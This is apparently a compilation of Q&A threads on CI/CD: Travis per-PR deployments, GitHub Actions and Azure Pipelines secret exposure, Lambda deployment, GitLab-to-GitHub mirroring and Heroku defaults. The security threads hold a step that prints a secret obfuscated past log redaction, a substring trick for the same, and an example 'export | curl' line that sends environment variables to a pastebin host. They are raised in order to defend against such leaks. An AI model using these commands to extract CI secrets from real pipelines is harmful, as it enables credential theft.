Having some trouble finding info on this, not sure exactly how I'd search for it so figured I'd just throw a question up here...
GitHub pull requests on Travis are pretty much ready to go out of the box, but I'm interested in deploying each PR to an independent URL (staging.example.com/pull-request-01, or something like that). It's possible that this is super simple and outlined in Travis' docs, but I'm having trouble finding it.
Does anyone have their CI setup like this?
Here is some Travis CI documentation I could find that will likely be useful in sorting out a full answer:
Pull Requests -- Pull Requests and Security Restrictions
Environment Variables -- Defining Encrypted Variables in travis.yml
Deployment -- Conditional Releases with on
Deployment -- Heroku
TL;DR
Encrypted variables are only available to pull requests issued from the same repository. Testing the environment variables to see what kind of Git interaction triggered Travis CI is required...
script:
  - if [ "$TRAVIS_PULL_REQUEST" != "false" ]; then bash ./travis/run_on_pull_requests; fi
Once signed into the Travis CI command-line interface, encrypting environment variables looks somewhat like...
travis encrypt -r owner/project --pro SOMEVAR="secretvalue"
... then copy the output from above (secure: ".... encrypted data ....") into the project's .travis.yml file.
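For reference, the resulting entry usually ends up under env in .travis.yml, something like (value elided):

env:
  global:
    - secure: ".... encrypted data ...."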
I didn't see anything for DigitalOcean, but there's not much stopping anyone from writing their own script for such things. For S3 deployment, it looks like Travis CI has some ready-made magic to read up on (third link above)...
deploy:
  provider: s3
  access_key_id: "YOUR AWS ACCESS KEY"
  secret_access_key: "YOUR AWS SECRET KEY"
  bucket: "S3 Bucket"
  skip_cleanup: true
  on:
    branch: release
    condition: $MY_ENV = super_awesome
A few more answers to your questions.
Does anyone have their CI setup like this?
I do not... yet. But I've been exploring the Travis CI documentation for some time and may edit this answer in the future to include more references.
I'm interested in deploying each PR to an independent URL (staging.example.com/pull-request-01, or something like that). It's possible that this is super simple and outlined in Travis' docs, but I'm having trouble finding it.
Aside from the previously suggested reading material, you'll likely want to do some custom stuff within a run_on_pull_requests script.
The easiest route I can think of at this time would be parsing the commit hash, so that URLs look a bit like staging.example.com/pull-request-4d3adbe3f.
Hints on how one might construct such a string in a Bash script...
printf 'pull-request-%s' "$(git rev-parse --short HEAD)"
_url="staging.example.com/pull-request-$(git rev-parse --short HEAD)"
I suggest the commit hash route because then anyone with permission to open pull requests from the given repository has a predictable way of building the URL on their end.
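To make that concrete, here's a rough run_on_pull_requests sketch; the bucket name and build directory are made up, and it assumes the AWS CLI is available on the build image:

#!/usr/bin/env bash
set -e

# Build a per-PR slug from the short commit hash
_slug="pull-request-$(git rev-parse --short HEAD)"

# Sync the build output to a matching prefix on S3
aws s3 sync ./build "s3://my-staging-bucket/${_slug}/"

echo "Preview available at http://staging.example.com/${_slug}"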
Consider letting us all know if ya get stuck or fully solve it.
Figured out a cool way to do this! Here is a pretty self-explanatory Gist that can help anyone trying to do this on an Ember project; it could probably also inform other code stacks..
https://gist.github.com/ChristopherJohnson25/7350169203a2ecfa9193785bede52bd3
This is also possible with Heroku Review Apps and Gitlab Review Apps. If you're using Docker you could also use this tool, which I built.
Related
I don't know why GitHub secrets are really called secrets, because they can be printed out by any person in the organization with push access: they create a branch, use the trick below to print the secret, and then delete the branch. With a snap of the fingers, any employee can take out the secrets.
If there is an optimal solution, kindly guide me on how to permanently secure my GitHub Actions secrets.
steps:
  - name: 'Checkout'
    uses: actions/checkout@master
  - name: 'Print secrets'
    run: |
      echo ${{ secrets.SOME_SECRET }} | sed 's/./& /g'
First off, GitHub has an article on Security hardening for actions, which contains some general recommendations.
In general, you want to distinguish between public and internal/private repositories.
Most of my following answer is on internal/private repositories, but if you're concerned about public repositories: Keep in mind that actions are not run on PRs from third parties until they are approved.
For internal/private repositories, you're going to have to trust your colleagues with some secrets. Going through the hassle of guarding all secrets to the extent that they can't be "extracted" by a colleague is probably not worth the effort. And at that point, you probably also have to ask yourself what damage a malicious employee could do even without knowing these secrets (perhaps they have inside knowledge of your business, or they work in IT and might be able to take your services offline, etc.). So you're going to have to trust them to some extent.
Some measures to limit the damage a malicious colleague could do:
Environment Secrets
You can create a secret for an environment and protect the environment.
For example, assume you want to prevent colleagues from taking your production secrets and deploy from their computers instead of going through GitHub actions.
You could create a job like the following:
jobs:
  prod:
    runs-on: ubuntu-latest
    environment: production
    steps:
      - run: ./deploy.sh --keys ${{ secrets.PROD_SECRET }}
Steps:
Configure the secret PROD_SECRET as an environment secret for production
Create the environment production and set up protection rules (a scripted sketch follows this list)
If you really want to be sure nobody does something you don't like, you can set yourself as a reviewer and then manually approve every deployment
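For completeness, environment protection can also be scripted through the REST API rather than the UI; a sketch using the gh CLI (owner, repo, and reviewer id are placeholders):

# Create/update the "production" environment with a required reviewer
cat <<'EOF' | gh api --method PUT "repos/OWNER/REPO/environments/production" --input -
{ "reviewers": [ { "type": "User", "id": 12345 } ] }
EOF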
Codeowners
You could use codeowners and protect the files in .github/workflows (see the docs for more about codeowners).
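A minimal CODEOWNERS sketch (the team name is made up; combine it with a branch protection rule that requires code owner reviews):

# .github/CODEOWNERS
# Require review from a designated team for any change to workflow files
/.github/workflows/ @my-org/platform-team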
OIDC and reusable workflows
If you're deploying to some cloud environment, you should probably use OpenID Connect. That, combined with reusable workflows, can give you an additional layer of security: You can specify which workflow is allowed to deploy to production.
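As a rough sketch, the workflow side only needs permission to request an OIDC token; the trust policy on the cloud side (not shown) is where you pin the allowed repository and workflow:

permissions:
  id-token: write   # allow this job to request an OIDC token
  contents: read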
@rethab's answer is great; I'll just add the answer I got from GitHub Support after I contacted them about a similar issue.
Thank you for writing to GitHub Support.
Please note that it is not expected behavior that GitHub will redact every possible obfuscation of the secrets from the logs.
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-secrets
To help prevent accidental disclosure, GitHub uses a mechanism that attempts to redact any secrets that appear in run logs. This redaction looks for exact matches of any configured secrets, as well as common encodings of the values, such as Base64. However, because there are multiple ways a secret value can be transformed, this redaction is not guaranteed.
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#exfiltrating-data-from-a-runner
To help prevent accidental secret disclosure, GitHub Actions automatically redact secrets printed to the log, but this is not a true security boundary because secrets can be intentionally sent to the log. For example, obfuscated secrets can be exfiltrated using echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};
Notice that in this case, what is being printed in the logs is NOT the secret that is stored in the repository but an obfuscation of it. Additionally, any user with Write access will be able to access secrets without needing to print them in the logs. They can run arbitrary commands in the workflows to send the secrets over HTTP or even store the secrets as workflows artifacts and download the artifacts.
You can read more about security hardening for GitHub Actions below:
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions
I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR in which they edit pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we cannot prevent a PR from changing those critical files.
As a workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually build these contributions, which gives you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.
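For what it's worth, once automatic fork builds are off, a team member can queue a validation build from a pull request comment along these lines (the shorter /azp run also works):

/AzurePipelines run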
I have a single repository on GitHub that hosts my Lambda functions. I would like to be able to deploy the new versions whenever new logic is pushed to master.
I did a lot of research and found a few different approaches, but nothing really clear. I would like to know what others feel would be the best way to go about this, and maybe some detail (if possible) on how that pipeline is set up.
Thanks
You can set up a CI/CD pipeline using CircleCI with its GitHub integration (which is an online service, so you don't need to maintain anything yourself, like a Jenkins server, for example).
Upon every commit to your repository, a CircleCI build will be triggered. Once the build process is over, you can declare sls deploy, sam deploy, use Terraform, or even create a script to upload the .zip file from your GitHub repo to an S3 bucket and then, within your script, invoke the create-function command. There's an example of how to deploy serverless applications using CircleCI along with the Serverless Framework here
Other options include TravisCI, AWS Code Deploy or even maintain your own CI/CD Server. The same logic applies to all of these tools though: commit -> build -> deploy (using one of the tools you've chosen).
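As a rough sketch of the CircleCI side (the image tag, stage name, and the use of the Serverless Framework are all assumptions):

# .circleci/config.yml
version: 2.1
jobs:
  deploy:
    docker:
      - image: cimg/node:18.0
    steps:
      - checkout
      - run: npm ci
      - run: npx serverless deploy --stage production
workflows:
  deploy-on-master:
    jobs:
      - deploy:
          filters:
            branches:
              only: master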
EDIT: After @Matt's answer, it clicked that the OP never mentioned the Serverless Framework (I somehow thought he was already using it, so I pointed the OP to tutorials that use the Serverless Framework). I then decided to update my answer with a few other options for serverless deployment.
I know that this isn't exactly what you asked for, but I use the Serverless Framework (https://serverless.com) for deployment and I love it. I don't do my deployments when I push to my repo. Instead, I push to my repo after I've deployed. I like this flow because a deployment can fail due to so many things, while pushing to GitHub is much less likely to fail. This way, I prevent code that failed to deploy from reaching my master branch.
I don't know if you're familiar with the framework, but it is super simple. The website describes the simple steps to create and deploy a function like this.
# Step 1. Install serverless globally
$ npm install serverless -g

# Step 2. Create a serverless function
$ serverless create --template hello-world

# Step 3. Deploy to cloud provider
$ serverless deploy

# Your function is deployed!
$ http://xyz.amazonaws.com/hello-world
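The deploy step reads a serverless.yml in the project root; a minimal sketch (the service name, runtime, and handler are made up):

# serverless.yml
service: hello-world
provider:
  name: aws
  runtime: nodejs18.x
functions:
  hello:
    handler: handler.hello
    events:
      - http:
          path: hello
          method: get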
There are also a number of plugins you can use to integrate easily with custom domains on API Gateway, prune older versions of Lambda functions that might be filling up your limits, etc...
Overall, I've found it to be the easiest way to manage and deploy my lambdas. Hope it helps!
Given that you're using AWS Lambda, you may want to consider CodePipeline to automate your release process. SAM (https://docs.aws.amazon.com/lambda/latest/dg/serverless_app.html) may also be interesting.
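If you go the SAM route, the deploy step boils down to something like this (the stack and bucket names are placeholders):

sam build
sam deploy --stack-name my-lambdas --s3-bucket my-artifacts-bucket --capabilities CAPABILITY_IAM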
I too had the same problem. I wanted to manage 12 Lambdas with one Git repository. I solved it by introducing Travis CI. Travis CI saved time and is really useful in many ways. We can check the logs whenever we want, and you can share the logs with anyone by sharing the URL. The sample documentation of all the steps can be found here. You can go through it. 👍
My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a GitLab server which was installed by our hosting provider.
The GitLab server has many projects.
For some of these projects, I want GitLab to automatically push to a remote repository (in this case GitHub) every time there is a push from a local client to GitLab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
Configure the local client with two remotes, and push simultaneously to GitLab and GitHub. I want to avoid this because developers.
Add a git post-receive hook in the repository on the GitLab server. This would be the most flexible option (I have sufficient Linux experience to write shell scripts as Git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider would need to give me shell access.
Use webhooks in GitLab. I am unfamiliar with even the basics of webhooks, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from GitLab that I found, and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
require 'sinatra/base'
require 'json'

class PewPewPew < Sinatra::Base
  post '/pew' do
    # Parse the JSON payload GitLab sends on push events
    push = JSON.parse(request.body.read)
    puts "I got some JSON: #{push.inspect}"
  end
end
Next: find out how to tell the GitLab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to GitHub. I can even do some "magic" (running tests, building jars, deploying to Artifactory, ...) before I push to GitHub. In fact, it would be great if Jenkins were able to push to a remote repository after a successful build; then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for GitLab, either natively or via a plugin. But I don't know. Yet.
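A bare-bones sketch of that pull-then-push idea (the URLs are placeholders; --mirror carries all branches and tags, which covers the requirement above):

#!/usr/bin/env bash
set -e

# One-time: create a bare mirror of the GitLab repository
git clone --mirror git@gitlab.example.com:group/project.git repo.git || true
cd repo.git

# On every webhook: refresh from GitLab, then mirror everything to GitHub
git remote update --prune
git push --mirror git@github.com:owner/project.git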
EDIT
I solved it in Jenkins.
You can set more than one Git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm; exactly what I wanted.
Option 1 would work, of course.
Option 2 is possible but dangerous, because GitLab Shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Option 3, web hooks, is not suitable directly: they make an HTTP request in a fixed format on certain events (in your case, push), not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (which already implements hook management) would be strictly better solutions.
Services would be the best option if someone implemented one: they live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI, or other CIs like Jenkins, is the best option currently available: they are essentially already-implemented servers for the webhooks, which automatically clone for you. All you have to do then is push from them.
The keywords you want to Google for are "gitlab mirror github". That led me to Gitlab repository mirroring, for instance. There seems to be no perfect, easy solution today.
Also this has already been proposed at the feature request forum at: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one Git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm; exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a #daily schedule from the BuildResultTrigger plugin.
I have more than one app/Git remote at Heroku, and I would like to know if it is possible to configure a default application so that, whenever I forget to specify the app (--app), the Toolbelt would use it.
You can set the heroku.remote key in your repo's Git config to the name of the default remote. For example, if your remote is called staging, you could do this:
$ git config heroku.remote staging
To see how this works, here is the relevant source.
For more information about this, see Managing Multiple Environments for an App.
You could also go for:
heroku git:remote -a <name-of-the-app>
or, if you tend to make a lot of mistakes by configuring the wrong apps, you can use this library I made: https://github.com/kubek2k/heroshell
This is a Heroku wrapper shell that allows you to work in the context of a given Heroku application.
You can set the HEROKU_APP environment variable.
Found this question while searching for it myself. The other answers refer to Heroku's old Ruby-based CLI. The new JS CLI doesn't seem to support the same git-remote-reading feature. A quick search of the source code on GitHub found this.
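For example, a quick sketch (the app name is made up):

export HEROKU_APP=my-app
heroku logs --tail   # no --app flag needed now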